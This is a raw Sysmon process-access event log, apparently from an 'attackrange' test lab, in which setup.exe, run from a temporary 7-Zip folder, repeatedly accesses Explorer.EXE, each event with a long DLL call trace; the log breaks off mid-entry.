13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.s